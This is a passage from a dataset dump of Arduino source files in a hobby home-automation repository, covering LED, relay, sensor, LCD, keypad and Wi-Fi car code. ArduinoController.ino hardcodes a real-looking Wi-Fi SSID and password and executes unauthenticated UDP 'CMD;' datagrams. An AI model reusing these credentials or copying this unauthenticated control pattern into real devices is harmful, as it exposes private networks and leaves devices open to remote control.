256)\n {\n pattern_progressing_increse = false;\n cur_lvl = 255;\n }\n } else {\n cur_lvl -= pattern_progressing_step;\n if (cur_lvl < 0)\n {\n pattern_progressing_increse = true;\n cur_lvl = pattern_progressing_step;\n }\n }\n}\n"
},
{
"alpha_fraction": 0.6438716650009155,
"alphanum_fraction": 0.6501840949058533,
"avg_line_length": 21.341176986694336,
"blob_id": "d7345e376757bcc53f81ab71925e2740098e0cf0",
"content_id": "36abd3e9ab87388b05790a91b5faa7142a442a38",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1901,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 85,
"path": "/lib/RbgLight/RbgLight.h",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n Copyright (C) 2014 Michael Duo Ling <[email protected]>\n\n This program is free software; you can redistribute it and/or\n modify it under the terms of the GNU General Public License\n version 2 as published by the Free Software Foundation.\n */\n\n/**\n * @file RbgLight.h\n *\n * Class declaration for RbgLight and helper enums\n */\n\n#ifndef __RBGLIGHT_H__\n#define __RBGLIGHT_H__\n\n#include <Arduino.h>\n\n#define RBGLIGHT_RED 1\n#define RBGLIGHT_BLUE 2\n#define RBGLIGHT_GREEN 4\n\n#define RBGLIGHT_PATTERN_PROGRESSING 0\n\nclass RbgLight\n{\nprivate:\n unsigned int r_pin;\n unsigned int b_pin;\n unsigned int g_pin;\n bool light_on_lvl;\n bool light_off_lvl;\n unsigned int pattern;\n bool pattern_progressing_increse;\n unsigned int pattern_progressing_step;\n unsigned int cur_lvl;\n unsigned int _default_color;\n\npublic:\n\n /**\n * @name Primary public interface\n *\n * These are the main methods you need to operate the chip\n */\n /**@{*/\n\n /**\n * Constructor\n *\n * Creates a new instance of this driver. Before using, create\n * an instance and send in the unique pins that this chip is\n * connected to.\n *\n * @param r_pin The pin attached to red controlling pin\n * @param b_pin The pin attached to blue controlling pin\n * @param g_pin The pin attached to green controlling pin\n * @param light_on_lvl HIGH|LOW to trigger LED light on\n */\n RbgLight(unsigned int _r_pin, unsigned int _b_pin,\n unsigned int _g_pin, bool _light_on_lvl);\n\n void begin(void);\n\n /**\n * Turn light on with given color.\n */\n void on(unsigned int color);\n\n /**\n * Turn light off.\n */\n void off(void);\n \n void set_pattern(unsigned int _pattern);\n void flash(unsigned int color, unsigned int interval = 100);\n void flash_pattern(unsigned int color);\n unsigned int default_color(void);\n\n /**@}*/\n\n};\n\n#endif // __RBGLIGHT_H__\n\n\n"
},
{
"alpha_fraction": 0.6156522035598755,
"alphanum_fraction": 0.6634782552719116,
"avg_line_length": 24.55555534362793,
"blob_id": "5abd8cfe9e082d7d42ef0934b592f7d11eb3a83b",
"content_id": "bb92908e43171b60ad0247f415efbbfa1d1c0b8a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1150,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 45,
"path": "/lib/UltraSoundDistanceMeas/examples/UltraSoundDistanceMeas/UltraSoundDistanceMeas.ino",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\nControl ultra sound echo module to measure distance.\n\nConnection:\n VCC -> 5V\n Trig -> Control input\n Echo -> Output\n GND -> GND\n*/\n\n#include \"UltraSoundDistanceMeas.h\"\n\nUltraSoundDistanceMeas ultraSoundDistanceMeas(9, 8);\n\n#define ULTRASOUND_TRIG 9\n#define ULTRASOUND_ECHO 8\n\nunsigned long distance; // in um\n#define ULTRASOUND_SPEED 340 // 340 m/s = 340 micrometer/microsecond\n/* lowest distance: 2cm = 2*1000 mm = 2000*1000 micrometer.\n longest distance: 450 cm = 450*1000*1000 micrometer\n so \"unsigned long\" should suffice.\n*/\n\n// the setup function runs once when you press reset or power the board\nvoid setup() {\n ultraSoundDistanceMeas.init();\n Serial.begin(9600);\n}\n\n// the loop function runs over and over again forever\nvoid loop() {\n distance = ultraSoundDistanceMeas.measure();\n if (distance !=0 )\n {\n Serial.print(\"distance = \");\n Serial.print(distance);\n Serial.print(\" micrometer = \");\n Serial.print(distance/1000);\n Serial.println(\" mm\");\n delay(2000);\n } else {\n Serial.println(\"Timed out. It's either too far away, or it's too close!\");\n }\n}\n"
},
{
"alpha_fraction": 0.5905796885490417,
"alphanum_fraction": 0.5905796885490417,
"avg_line_length": 11.590909004211426,
"blob_id": "bc4068dfe209a460700d98b66ea488e8c20f3a95",
"content_id": "4a807fd37fb30338bddf8ecb34aebc9b849bc08e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 276,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 22,
"path": "/ArduinoController/Cmd.h",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n*/\n\n#ifndef __CMD_H__\n#define __CMD_H__\n\n#include <Arduino.h>\n\nclass Cmd\n{\nprivate:\n String _cmdS;\n\npublic:\n\n // constructor with a cmd string, without the leading \"CMD;\"\n Cmd(String __cmdS);\n // execute commands\n void execute(void);\n};\n\n#endif // __CMD_H__"
},
{
"alpha_fraction": 0.6304348111152649,
"alphanum_fraction": 0.6397515535354614,
"avg_line_length": 13.636363983154297,
"blob_id": "fd0c96d908a2c0a25b2c6dfe117df7d37c0abebc",
"content_id": "38d62bf985856771e9d4163964f5d1102fa158cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 322,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 22,
"path": "/lib/Relay/examples/Relay/Relay.ino",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\nControl a relay\n\nConnection:\n\n*/\n#include \"Relay.h\"\n\nRelay relay(9, HIGH);\n\n// the setup function runs once when you press reset or power the board\nvoid setup() {\n relay.begin(LOW);\n}\n\n// the loop function runs over and over again forever\nvoid loop() {\n relay.on();\n delay(1);\n relay.off();\n delay(1);\n}\n"
},
{
"alpha_fraction": 0.5935251712799072,
"alphanum_fraction": 0.6474820375442505,
"avg_line_length": 20.346153259277344,
"blob_id": "c855756711aecfd0748aae9ca0645fda1ba7444f",
"content_id": "df0e7dba1068a2b6e149677172f989ab3d49814a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 556,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 26,
"path": "/LcdDisplay/DS3231.h",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "\n#ifndef __DS3131_H__\n#define __DS3131_H__\n\n#include <Arduino.h>\n#include \"Wire.h\"\n\nconst byte DS3231_I2C_ADDRESS\t= 0x57;\n\nclass DS3231\n{\nprivate:\n int i2c_addr;\n byte second, minute, hour, dayOfWeek, dayOfMonth, month, year;\n byte decToBcd(byte val);\n byte bcdToDec(byte val);\n void _readTime(void);\n\npublic:\n DS3231(int _i2c_addr);\n void begin(void);\n void setTime(byte second, byte minute, byte hour, byte dayOfWeek,\n byte dayOfMonth, byte month, byte year);\n String readTime(void);\n};\n\n#endif\t// __DS3131_H__\n"
},
{
"alpha_fraction": 0.44932734966278076,
"alphanum_fraction": 0.4681614339351654,
"avg_line_length": 32.818180084228516,
"blob_id": "dd956a3baf424a696fcb8805db2f42839f9ef437",
"content_id": "3d4349d07a8fea9354c8394fc1993433a9787559",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1115,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 33,
"path": "/lib/RbgLight/README.md",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "# Control 3-Pin (RBG) LED lights\n \nDesign Goals: This library is designed to be... \n \n* Easy control of RBG LED lights\n* Support many flashing patterns (only one is implemented now...)\n \nSupported Boards: \n \n* Uno\n\n## Pin layout\n\nThe table below shows how to connect the the pins of the RBG LED light\nto Arduino UNO board.\nR, B, and G pins are configurable.\n\n| PIN | RBG LED | Arduino UNO | ATtiny25/45/85 [0] | ATtiny44/84 [1] |\n|-----|----------|-------------|--------------------|-----------------|\n| 1 | V | GND | | |\n| 2 | R | 8 | | |\n| 3 | B | 9 | | |\n| 4 | G | 10 | | |\n\n\n**Constructor:**\n\n RbgLight(unsigned int _r_pin, unsigned int _b_pin,\n unsigned int _g_pin, bool _light_on_lvl);\n _r_pin: which pin is connected to R;\n _b_pin: which pin is connected to B;\n _g_pin: which pin is connected to G;\n _light_on_lvl: activation level (usually HIGH activate light)."
},
{
"alpha_fraction": 0.4909280240535736,
"alphanum_fraction": 0.5178465247154236,
"avg_line_length": 32.28712844848633,
"blob_id": "2fa87db73de81bdb8b74c869fe7214c71ab1ec5f",
"content_id": "a8fbcf558dbb1a6e6bcf0a95a84dd876366f67a7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 6724,
"license_type": "no_license",
"max_line_length": 138,
"num_lines": 202,
"path": "/ArduinoController/ArduinoController.ino",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n One Arduino with support of:\n 1. one relay;\n 2. one temperature sensor;\n http://bildr.org/2011/07/ds18b20-arduino/\n http://www.hobbytronics.co.uk/ds18b20-arduino\n http://www.pjrc.com/teensy/td_libs_OneWire.html\n https://github.com/milesburton/Arduino-Temperature-Control-Library\n http://www.milesburton.com/?title=Dallas_Temperature_Control_Library\n http://datasheets.maximintegrated.com/en/ds/DS18B20.pdf\n 3. one light sensor;\n 4. one infrared detector;\n 5. one ESP8266 (Serial over Wifi);\n\n Connection:\n 1 relay\n VCC ->\n GND -> GND\n IN -> PIN_3\n 2 DS18B20\n GND -> GND\n VDD -> 5V\n DAT -> 4.7 kOhm -> 5V\n DAT -> PIN_4\n 3 light sensor\n VCC -> 5V\n GND -> GND\n DO -> PIN_5\n 4 Infrared sensor\n VCC -> 5V\n GND -> GND\n OUT -> PIN_6\n\n 5 ESP8266\n If you hold ESP8266 with antenna end upwards and all chips facing you, then from upper left corner to upper right corner, then\n from lower left corner to lower right corner, you have pins:\n GND, GPIO2, GPIO0, URXD\n UTXD, CH_PD, RST, VCC\n connection:\n GND -> GND\n URXD -> TXD 1\n UTXD -> RXD 0\n CH_PD -> 3.3V\n VCC -> 3.3V\n connection for debugging:\n URXD -> PIN_11\n UTXD -> PIN_10\n\n Overall description:\n 1. Use ESP8266 to connect to wifi;\n 2. Send periodically report using ASCII and UDP datagram to predefined IP address and port;\n 3. For each UDP report sent, one command datagram can be received and executed;\n\n Binary sketch size: 16278 Bytes (if all chips are used)\n Binary sketch size limit:\n Arduino Uno: 32256 Bytes\n Arduino Nano w/ ATmega328: 30720 Bytes\n*/\n\n/**** Debug Settings *********************************************************/\n/**** End of Debug Settings **************************************************/\n\n/**** Chip Usage **************************************************************\n Comment out the define if the chip is not used.\n*/\n#define USE_RELAY\n#define USE_TEMPERATURE_SENSOR\n//#define USE_LIGHT_SENSOR\n//#define USE_INFRARED_SENSOR\n// ESP8266 is always used\n/**** End of Chip Usage ******************************************************/\n\n/**** Chip Connection *********************************************************\n Change port connection if otherwise\n*/\n#ifdef USE_RELAY\n #include \"Relay.h\"\n #define RELAY_IN_PORT 3\n #define RELAY_OFF HIGH\n Relay relay(RELAY_IN_PORT, RELAY_OFF);\n#endif\n\n#ifdef USE_TEMPERATURE_SENSOR\n #include <OneWire.h>\n #include \"TemperatureSensor.h\"\n #define DS18B20_PIN 4\n OneWire ds18b20(DS18B20_PIN);\n#endif\n\n#ifdef USE_LIGHT_SENSOR\n #include \"LightSensor.h\"\n #define LIGHTSENSOR_PORT 5\n LightSensor lightSensor(LIGHTSENSOR_PORT);\n#endif\n\n#ifdef USE_INFRARED_SENSOR\n #include \"InfraredSensor.h\"\n #define INFRAREDSENSOR_PORT 6\n InfraredSensor infraredSensor(INFRAREDSENSOR_PORT);\n#endif\n/**** End of Chip Connection *************************************************/\n\n/**** ESP8266 Configurations *************************************************/\n#include \"uartWIFI.h\"\n#ifdef ESP8266_DEBUG\n #include <SoftwareSerial.h>\n#endif\n#include \"Cmd.h\"\n#define SSID \"michael\"\n#define PASSWORD \"waterpigs\"\n#define SERVER_IP \"192.168.31.107\" //RaspberryPi\n#define SERVER_PORT 9999\n// Reporting configuration\n#define REPORT_INTERVAL 10 // in seconds, between two reports\n#define ARDUINO_ID \"FrontDoorStep\" // ID\nWIFI wifi; // ESP8266 serial over Wifi\nchar wifiBuffer[128]; // buffer for receiving data\n/**** End of ESP8266 Configurations ******************************************/\n\n/**** Defines ****************************************************************/\n/**** End of Defines *********************************************************/\n\n/**** Global Variables *******************************************************/\nunsigned long last_report_time;\n/**** End of Global Variables ************************************************/\n\n// the setup function runs once when you press reset or power the board\nvoid setup() {\n #ifdef USE_RELAY\n relay.begin(RELAY_OFF);\n #endif\n //lightSensor.begin();\n //infraredSensor.begin();\n\n last_report_time = 0;\n\n // initialize ESP8266\n wifi.begin();\n wifi.Initialize(STA, SSID, PASSWORD);\n delay(8000); //make sure the module have enough time to get an IP address\n wifi.ipConfig(UDP, SERVER_IP, SERVER_PORT); // configure server info\n}\n\n// the loop function runs over and over again forever\nvoid loop() {\n // we send a report every 60 seconds\n unsigned long cur_time = millis();\n bool do_report = false;\n if (cur_time < last_report_time)\n {\n // time counter has wrapped around.\n do_report = true;\n }\n else if (cur_time - last_report_time >= REPORT_INTERVAL*1000)\n {\n do_report = true;\n }\n\n if (do_report)\n {\n last_report_time = cur_time;\n String report = String(\"REPORT;\"); // + String(ARDUINO_ID) + \";\";\n report += ARDUINO_ID;\n report += \";\";\n // relay status\n #ifdef USE_RELAY\n report += \"Relay;\";\n report += String(int(100 * relay.cur_lvl()));\n report += \";\";\n #endif\n // temperature sensor\n #ifdef USE_TEMPERATURE_SENSOR\n report += \"Temperature;\";\n report += String(int(100 * get_temperature(&ds18b20)));\n report += \";\";\n #endif\n // light sensor\n #ifdef USE_LIGHT_SENSOR\n report += \"Light;\";\n report += String(int(100 * lightSensor.get()));\n report += \";\";\n #endif\n // infra-red sensor\n #ifdef USE_INFRARED_SENSOR\n report += String(\"Infrared;\");\n report += String(int(100 * infraredSensor.get()));\n report += \";\";\n #endif\n wifi.Send(report);\n\n // receive response (cmd) from server\n int data_len = wifi.ReceiveMessage(wifiBuffer);\n if (data_len >= 4) { // minimum length of CMD datagram, i.e. \"CMD;\"\n String datagram = String(wifiBuffer);\n if (datagram.startsWith(\"CMD;\", 0)) {\n // this is a valid CMD datagram\n datagram = datagram.substring(4);\n Cmd(datagram).execute();\n }\n }\n }\n}\n"
},
{
"alpha_fraction": 0.49275875091552734,
"alphanum_fraction": 0.537265956401825,
"avg_line_length": 25.448598861694336,
"blob_id": "9ba9dca6386ff8dfd69c71daf6b990205e12e2a9",
"content_id": "520338f30f9df75099c28a3b7cb5c5ae30e0a7e4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2831,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 107,
"path": "/LcdDisplay/LcdDisplay.ino",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/* Connections:\n 20-char 4-line LCD display QC2004A:\n PIN_1 to PIN_16 <-> I2C adapter PIN_1 to PIN_16\n I2C adapter: hole it with all chips facing you, and 16 pins on the top, then these pins\n from left to right are PIN_16 to PIN_1\n GND <-> GND\n VCC <-> 5V\n SDA <-> A4 (on Mini); SDA <-> 1kOhm <-> 5V\n SCL <-> A5 (on Mini); SCL <-> 1kOhm <-> 5V\n its I2C addr: 0x27\n Clock chip SZ-042:\n GND <-> GND\n VCC <-> 5V\n SDA <-> A4 (on Mini); SDA <-> 1kOhm <-> 5V\n SCL <-> A5 (on Mini); SCL <-> 1kOhm <-> 5V\n its I2C addr: 0x68\n DS18B20 temperature sensor:\n GND <-> GND;\n VCC <-> 5V;\n DAT <-> D4 (on Mini); DAT <-> 1kOhm <-> 5V\n PIR sensor:\n GND <-> GND\n VCC <-> 5V\n OUT <-> D2 (on Mini)\n*/\n\n\n#include <Wire.h> \n#include \"LiquidCrystal_I2C.h\"\n#include \"DS3231.h\"\n#include \"TemperatureSensor.h\"\n\n//#define ENABLE_DEBUG\n\n// Set the LCD address to 0x27 for a 16 chars and 2 line display\nLiquidCrystal_I2C lcd(0x27, 20, 4);\n\nDS3231 clock(0x68);\nboolean set_time = false;\n\nOneWire ds(4); // temperature sensor\n\nconst int PIR_PIN = 2;\nconst byte ON_PERIOD = 20; // 60 * 1024 milliseconds\nvolatile byte onTime;\n\nvoid motion() {\n onTime = ON_PERIOD;\n}\n\nvoid setup()\n{\n // initialize the LCD\n lcd.begin();\n \n clock.begin();\n \n #ifdef ENABLE_DEBUG\n Serial.begin(19200);\n #endif\n\n // Turn on the blacklight and print a message.\n lcd.backlight();\n if (set_time) {\n clock.setTime(0, 43, 19, 6, 31, 7, 15);\n }\n \n onTime = ON_PERIOD;\n //pinMode(2, INPUT);\n attachInterrupt(0, motion, CHANGE);\n}\n\nvoid loop()\n{\n unsigned long start_time = millis();\n byte consumedSec = 0;\n if (onTime !=0 ) {\n lcd.backlight();\n } else {\n lcd.noBacklight();\n }\n String curTime = clock.readTime();\n #ifdef ENABLE_DEBUG\n Serial.println(curTime);\n Serial.print(\"onTime=\"); Serial.println(onTime);\n #endif\n lcd.setCursor(0, 0); // column, row\n lcd.print(curTime);\n \n float temperature = get_temperature(&ds);\n #ifdef ENABLE_DEBUG\n Serial.print(\"Temperature: \"); Serial.println(temperature);\n #endif\n lcd.setCursor(0, 1);\n lcd.print(\"Temp: \"); lcd.setCursor(6, 1);\n lcd.print(temperature); lcd.setCursor(11, 1);\n lcd.print(\" Celsius\");\n //String temperature = String(\"Temp: \") + temperature + \" Celsius\";\n //lcd.print(String(\"Temp: \") + temperature + \" Celsius\");\n delay(1000);\n consumedSec = (millis() - start_time) >> 10;\n if (consumedSec < onTime) {\n onTime -= consumedSec;\n } else {\n onTime = 0;\n }\n}\n\n"
},
{
"alpha_fraction": 0.6765799522399902,
"alphanum_fraction": 0.6877323389053345,
"avg_line_length": 18.214284896850586,
"blob_id": "6d9a66237f858e0d14acdde8222339d9aad44096",
"content_id": "0aab090d2e0b81fe9dfdb3e3e42564f0b56f6a54",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 269,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 14,
"path": "/elSkateboard/CurrentSensor.cpp",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "#ifndef __CURRENT_SENSOR_CPP__\n#define __CURRENT_SENSOR_CPP__\n\n#include \"CurrentSensor.h\"\n\nCurrentSensor::CurrentSensor(int _pin):\n pin(_pin){\n}\n\nfloat CurrentSensor::read() {\n return (analogRead(pin) - 512) * CURRENT_RESOLUTION;\n}\n\n#endif // __CURRENT_SENSOR_CPP__\n"
},
{
"alpha_fraction": 0.747922420501709,
"alphanum_fraction": 0.8005540370941162,
"avg_line_length": 29,
"blob_id": "8415047787e34756d275eb98881b20be10f19c70",
"content_id": "b3e190a1bcb0eb41eef45376e1b34f4ef0ac482c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 361,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 12,
"path": "/MowerRobot/UltraSonicSensorProxy/constants.h",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "\n#ifndef __ULTRASONICSENSORPROXY_H__\n#define __ULTRASONICSENSORPROXY_H__\n\nconst uint8_t UltraSonicSensorProxyAddress = 0x10;\nconst uint8_t UltraSonicSensorNumber = 0x6;\nconst unsigned long UltraSonicSensorTimeOut = 300 * 2 * 29;\n\n\nconst uint8_t UltraSonicSensorProxyCmdSetThreshold = 0x0;\nconst uint8_t UltraSonicSensorProxyCmdRequestDistance = 0x1;\n\n#endif\n"
},
{
"alpha_fraction": 0.6113927960395813,
"alphanum_fraction": 0.6606024503707886,
"avg_line_length": 35.05376434326172,
"blob_id": "cc4cd752c6db338d7c651608abb49f9ae31f87fd",
"content_id": "ae58631552f03275bb2bcda3f7456129b2009610",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3353,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 93,
"path": "/MiniTempSensor/FourDigitDisplay.h",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n4-digit 7-segment display model: F2481AH\nHold the display panel towards you, and all the decimal points at the downside, then\nthe pins from down-left to down-right, and then top-right to top-left are:\n PIN_1 to PIN_7, PIN_8 to PIN_14\n\nBasics:\n 1. one digit is composed of 7 segments\n 2. one digit is selected if its pin is LOW\n 3. one segment of the selected digit is selected if its pin is HIGH\n\nSelections:\n digit_1 <- PIN_12\n digit_2 <- PIN_1\n digit_3 <- PIN_5\n digit_4 <- PIN_9\n segment_A <- PIN_14\n segment_B <- PIN_8\n segment_C <- PIN_6\n segment_D <- PIN_2,7\n segment_E <- PIN_4\n segment_F <- PIN_13\n segment_G <- PIN_10\n decimal_point <- PIN_3\n colon <- PIN_11 // not used in this lib\n\n A\n __\n F|__| B the middle one is G\n E|__| C\n D\n\nConnect all pins to digital pins on Arduino, if analog pin is used, in constructor\nuse analog pin number + 100. E.g. if digit_1 pin is connected to PIN_A1 on\nArduino, then when calling the constructor give the pin number as 101.\nNote that this is only valid for the four digit selection pins.\n*/\n\n#ifndef __FOURDIGITDISPLAY_H__\n#define __FOURDIGITDISPLAY_H__\n\n#include <Arduino.h>\n\n// display patterns for digits 0 to 9, here 1 means light up. so in program they\n// need to be binary negated\n// bit 0 is segment_A, bit 6 is segment_G\nconst byte DISPLAY_PATTERN_ZERO = B00111111;\nconst byte DISPLAY_PATTERN_ONE = B00000110;\nconst byte DISPLAY_PATTERN_TWO = B01011011;\nconst byte DISPLAY_PATTERN_THREE = B01001111;\nconst byte DISPLAY_PATTERN_FOUR = B01100110;\nconst byte DISPLAY_PATTERN_FIVE = B01101101;\nconst byte DISPLAY_PATTERN_SIX = B01111101;\nconst byte DISPLAY_PATTERN_SEVEN = B00000111;\nconst byte DISPLAY_PATTERN_EIGHT = B01111111;\nconst byte DISPLAY_PATTERN_NINE = B01101111;\nconst byte DISPLAY_PATTERN_MINUS = B01000000; // the minus sign\nconst byte DISPLAY_PATTERN_OUT_OF_RANGE = B11111111;\nconst byte DISPLAY_PATTERNS[12] = {DISPLAY_PATTERN_ZERO, DISPLAY_PATTERN_ONE,\n DISPLAY_PATTERN_TWO, DISPLAY_PATTERN_THREE, DISPLAY_PATTERN_FOUR,\n DISPLAY_PATTERN_FIVE, DISPLAY_PATTERN_SIX, DISPLAY_PATTERN_SEVEN,\n DISPLAY_PATTERN_EIGHT, DISPLAY_PATTERN_NINE, DISPLAY_PATTERN_MINUS };\n\nclass FourDigitDisplay\n{\nprivate:\n int min_value, max_value; // minimum and maximum value can be displayed\n int d1, d2, d3, d4; // digit selection pins\n int d_pins[4];\n int sA, sB, sC, sD, sE, sF, sG; // segment selection pins\n int s_pins[7];\n int dp; // decimal point selection pin\n byte d_values[4] = {255};\n byte f_values[4] = {0};\n\npublic:\n FourDigitDisplay( int _d1, int _d2, int _d3, int _d4,\n int _sA, int _sB, int _sC, int _sD, int _sE, int _sF, int _sG,\n int _dp);\n void init(void);\n void clear(void);\n void select_digit(byte nr); // select one digit\n void digit(byte d, boolean use_dp); // display one digit\n void _prepare(int value);\n void _prepare(double value);\n void _display(boolean only_int);\n void display(int value);\n void display(int value, unsigned long ms); // display given value for ms milliseconds.\n void display(double value);\n void display(double value, unsigned long ms);\n};\n\n#endif // __FOURDIGITDISPLAY_H__\n"
},
{
"alpha_fraction": 0.5525222420692444,
"alphanum_fraction": 0.6017804145812988,
"avg_line_length": 25.28125,
"blob_id": "f01f529fac971e66a3512c8f0f4deae3eb0fe4cc",
"content_id": "bc6c28dea3d18b500c0233f6710b79c270c02ea2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1685,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 64,
"path": "/Keypad/Keypad.ino",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "\n\nconst byte numRows= 4; //number of rows on the keypad\nconst byte numCols= 4; //number of columns on the keypad\n\n//keymap defines the key pressed according to the row and columns just as appears on the keypad\nchar keymap[numRows][numCols]= \n{\n {'1', '2', '3', 'A'}, \n {'4', '5', '6', 'B'}, \n {'7', '8', '9', 'C'},\n {'*', '0', '#', 'D'}\n};\n\n/*\n if you hold the keypad with buttons facing you and the cables dropping down, then\n the cables from left to right are:\n rows 0 to 3, and then columns 0 to 3\n*/\n\n//Code that shows the the keypad connections to the arduino terminals\nbyte rowPins[numRows] = {8,7,6,5}; //Rows 0 to 3\nbyte colPins[numCols] = {12,11,10,9}; //Columns 0 to 3\n\n\nvoid setup()\n{\n Serial.begin(9600);\n}\n\n//If key is pressed, this key is stored in 'keypressed' variable\n//If key is not equal to 'NO_KEY', then this key is printed out\n//if count=17, then count is reset back to 0 (this means no key is pressed during the whole keypad scan process\nconst int dpins[8] = {5,6,7,8,9,10,11,12};\nconst int apins[8] = {26,25,24,23,22,21,20,19};\nint avalues[8] = {0};\nint dvalues[8] = {0};\n\nvoid loop()\n{\n boolean apressed = false;\n boolean dpressed = false;\n for (int i=0; i<8; i++) {\n avalues[i] = analogRead(apins[i]);\n delay(50);\n dvalues[i] = digitalRead(dpins[i]);\n if (avalues[i] > 500) {\n apressed = true;\n }\n if (dvalues[i] == 1) {\n dpressed = true;\n }\n }\n if (apressed) {\n for (int i=0; i<8; i++) {\n Serial.print(avalues[i]); Serial.print(\",\");\n }\n Serial.println(\"\");\n }\n if (dpressed) {\n for (int i=0; i<8; i++) {\n Serial.print(dvalues[i]); Serial.print(\",\");\n }\n Serial.println(\"\");\n }\n}\n\n"
},
{
"alpha_fraction": 0.613081157207489,
"alphanum_fraction": 0.6390858888626099,
"avg_line_length": 17.39130401611328,
"blob_id": "64c3b2471b79b5302bfad70f74d5a6bc59bc7155",
"content_id": "62cece067cb536e3f809857694bbb33e22114ad8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1269,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 69,
"path": "/WifiCar/protocol.h",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n*/\n\n#ifndef __PROTOCOL_H__\n#define __PROTOCOL_H__\n\n#include <Arduino.h>\n\nconst char SEPARATOR = ':';\nconst char END_MARK = ';';\n\nconst String TYPE_COMMAND = \"CMD\";\nconst String TYPE_RESPONSE = \"RSP\";\n\n// op codes for commands\nconst int OP_CODE_UNKNOWN = 0x00;\nconst int OP_CODE_TEMPERATURE = 0x01;\nconst int OP_CODE_ECHO = 0x02;\nconst int OP_CODE_MOTOR_FORWARD = 0x03;\nconst int OP_CODE_MOTOR_BACKWARD = 0x04;\nconst int OP_CODE_MOTOR_STOP = 0x05;\nconst int OP_CODE_MOTOR_SPEEDUP = 0x06;\nconst int OP_CODE_MOTOR_SPEEDDOWN = 0x07;\nconst int OP_CODE_MOTOR_TURNLEFT = 0x08;\nconst int OP_CODE_MOTOR_TURNRIGHT = 0x09;\n\n// status for responses\nconst int STATUS_OK = 0xfe;\nconst int STATUS_NOK = 0xfd;\nconst int STATUS_UNSUPPORTED = 0xfc;\n\nvoid send(String a_str);\n\nclass Command\n{\nprivate:\n String _str;\n\npublic:\n int op_code;\n boolean is_ok;\n String op_str;\n String error;\n Command(String _str = \"\");\n String echo(void);\n};\n\nclass Response\n{\nprivate:\n String msg;\n int status;\n\npublic:\n Response(int _status, String _msg);\n String to_s(void);\n};\n\nclass DebugMsg\n{\nprivate:\n String _str;\n\npublic:\n DebugMsg(String _str);\n String to_s(void);\n};\n\n#endif // __PROTOCOL_H__\n"
},
{
"alpha_fraction": 0.6000000238418579,
"alphanum_fraction": 0.625,
"avg_line_length": 19,
"blob_id": "d750a96b3bb7fe95a80fa2b46fc56939af842868",
"content_id": "23cac8b6bd000509ada35848f7d8f3a38dfb8dea",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 240,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 12,
"path": "/WifiCar/echoSerial/echoSerial.ino",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "#define SERIAL_BAUDRATE 19200\n\nvoid setup(){\n Serial.begin(SERIAL_BAUDRATE);\n}\n\nvoid loop(){\n if (Serial.available()) {\n String s = Serial.readStringUntil(0); // read until new line character\n Serial.print(s);\n }\n}\n"
},
{
"alpha_fraction": 0.625,
"alphanum_fraction": 0.625,
"avg_line_length": 13.5,
"blob_id": "f2bd107f719e9b40be87861be8901b3f7f747f96",
"content_id": "82b6d1f0b8452e4f3c70dde47e04f6bf6b0cadcc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 232,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 16,
"path": "/WifiCar/debug.h",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n Define debug macros.\n*/\n\n#ifndef __DEBUG_H__\n#define __DEBUG_H__\n\n#include <Arduino.h>\n\n#ifdef ENABLE_DEBUG\n #define dbg_print(a_str) Serial.println(a_str)\n#else\n #define dbg_print(a_str)\n#endif\n\n#endif // __DEBUG_H__\n"
},
{
"alpha_fraction": 0.6014760136604309,
